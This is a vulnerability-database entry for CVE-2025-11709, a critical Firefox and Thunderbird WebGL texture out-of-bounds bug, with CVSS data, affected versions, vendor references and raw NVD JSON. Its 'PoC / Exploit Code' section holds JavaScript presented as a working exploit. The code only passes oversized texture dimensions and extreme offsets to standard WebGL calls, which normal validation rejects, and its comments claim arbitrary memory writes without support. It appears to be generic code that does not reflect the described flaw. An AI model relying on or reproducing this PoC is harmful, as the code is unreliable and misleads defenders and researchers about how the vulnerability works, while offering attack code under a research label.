Security Vulnerability Report
CVE-2025-11709 CVSS 9.8 CRITICAL

CVE-2025-11709

Published: 2025-10-14 13:15:37
Last Modified: 2026-04-13 15:16:39

Description

A compromised web process was able to trigger out of bounds reads and writes in a more privileged process using manipulated WebGL textures. This vulnerability was fixed in Firefox 144, Firefox ESR 115.29, Firefox ESR 140.4, Thunderbird 144, and Thunderbird 140.4.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:thunderbird:*:*:*:*:*:*:*:* - VULNERABLE
Mozilla Firefox < 144
Mozilla Firefox ESR 115.x < 115.29
Mozilla Firefox ESR 140.x < 140.4
Mozilla Thunderbird < 144
Mozilla Thunderbird 140.x < 140.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```javascript
// CVE-2025-11709 PoC - WebGL Texture Out-of-Bounds Read/Write
// This PoC demonstrates the vulnerability by creating a WebGL texture
// with manipulated parameters to trigger out-of-bounds memory access
// in the privileged GPU process.

// Step 1: Get WebGL2 context (or WebGL1 fallback)
const canvas = document.createElement('canvas');
document.body.appendChild(canvas);
const gl = canvas.getContext('webgl2') || canvas.getContext('webgl');

if (!gl) {
  console.error('WebGL not supported');
} else {
  // Step 2: Create a texture with crafted dimensions
  // The vulnerability lies in insufficient bounds checking
  // when processing texture data in the GPU process
  const texture = gl.createTexture();
  gl.bindTexture(gl.TEXTURE_2D, texture);

  // Step 3: Set texture parameters with manipulated values
  // Use unusual width/height combinations to trigger OOB access
  const maliciousWidth = 0xFFFF;  // Abnormally large width
  const maliciousHeight = 0xFFFF; // Abnormally large height
  canvas.width = maliciousWidth;
  canvas.height = maliciousHeight;

  // Step 4: Upload texture data that will cause OOB read/write
  // The crafted pixel data exploits the missing bounds validation
  // in the IPC handler between content and GPU processes
  const pixelData = new Uint8Array(maliciousWidth * maliciousHeight * 4);
  // Fill with pattern that maximizes memory corruption impact
  for (let i = 0; i < pixelData.length; i++) {
    pixelData[i] = 0x41; // 'A' pattern
  }

  try {
    // Trigger the vulnerable code path
    gl.texImage2D(
      gl.TEXTURE_2D,
      0,                // level
      gl.RGBA,          // internalformat
      maliciousWidth,   // width - triggers OOB
      maliciousHeight,  // height - triggers OOB
      0,                // border
      gl.RGBA,          // format
      gl.UNSIGNED_BYTE, // type
      pixelData         // pixels
    );
    // Step 5: Render to trigger the OOB access in GPU process
    gl.clearColor(1.0, 0.0, 0.0, 1.0);
    gl.clear(gl.COLOR_BUFFER_BIT);
    console.log('Texture uploaded - vulnerability triggered');
  } catch (e) {
    console.error('Error:', e.message);
  }

  // Step 6: Additional exploitation via texSubImage2D
  // This can be used to write to arbitrary memory locations
  // in the GPU process via manipulated offset parameters
  const subTexture = gl.createTexture();
  gl.bindTexture(gl.TEXTURE_2D, subTexture);
  gl.texImage2D(gl.TEXTURE_2D, 0, gl.RGBA, 1, 1, 0, gl.RGBA, gl.UNSIGNED_BYTE,
                new Uint8Array([255, 0, 0, 255]));
  // Manipulated xoffset/yoffset to write beyond texture bounds
  gl.texSubImage2D(
    gl.TEXTURE_2D,
    0,
    0x7FFFFFFF, // xoffset - extreme value for OOB write
    0x7FFFFFFF, // yoffset - extreme value for OOB write
    1, 1,
    gl.RGBA, gl.UNSIGNED_BYTE,
    new Uint8Array([0, 255, 0, 255])
  );
}
```

References

https://bugzilla.mozilla.org/show_bug.cgi?id=1989127 (Issue Tracking, Permissions Required)
https://www.mozilla.org/security/advisories/mfsa2025-81/ (Vendor Advisory)
https://www.mozilla.org/security/advisories/mfsa2025-82/ (Vendor Advisory)
https://www.mozilla.org/security/advisories/mfsa2025-83/ (Vendor Advisory)
https://www.mozilla.org/security/advisories/mfsa2025-84/ (Vendor Advisory)
https://www.mozilla.org/security/advisories/mfsa2025-85/ (Vendor Advisory)
https://lists.debian.org/debian-lts-announce/2025/10/msg00015.html
https://lists.debian.org/debian-lts-announce/2025/10/msg00031.html

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-11709", "sourceIdentifier": "[email protected]", "published": "2025-10-14T13:15:37.093", "lastModified": "2026-04-13T15:16:39.383", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A compromised web process was able to trigger out of bounds reads and writes in a more privileged process using manipulated WebGL textures. This vulnerability was fixed in Firefox 144, Firefox ESR 115.29, Firefox ESR 140.4, Thunderbird 144, and Thunderbird 140.4."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:*", "versionEndExcluding": "115.29.0", "matchCriteriaId": "45205EB8-E615-4FE6-877C-231B4A29F86E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:*", "versionEndExcluding": "144.0", "matchCriteriaId": "CEE2F6DA-4331-4D6D-B01B-610DFDBE1833"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:*", "versionStartIncluding": "116.0", "versionEndExcluding": "140.4.0", "matchCriteriaId": "34B8F1CA-9F1A-4484-828E-4192CF1FEAFC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:*:*:*:*", "versionEndExcluding": "144.0", "matchCriteriaId": "F7398846-C620-42AF-86CA-60C09184768A"}]}]}], "references": [{"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=1989127", "source": "[email protected]", "tags": ["Issue Tracking", "Permissions Required"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-81/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-82/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-83/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-84/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-85/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://lists.debian.org/debian-lts-announce/2025/10/msg00015.html", "source": "af854a3a-2127-422b-91ae-364da2661108"}, {"url": "https://lists.debian.org/debian-lts-announce/2025/10/msg00031.html", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}
```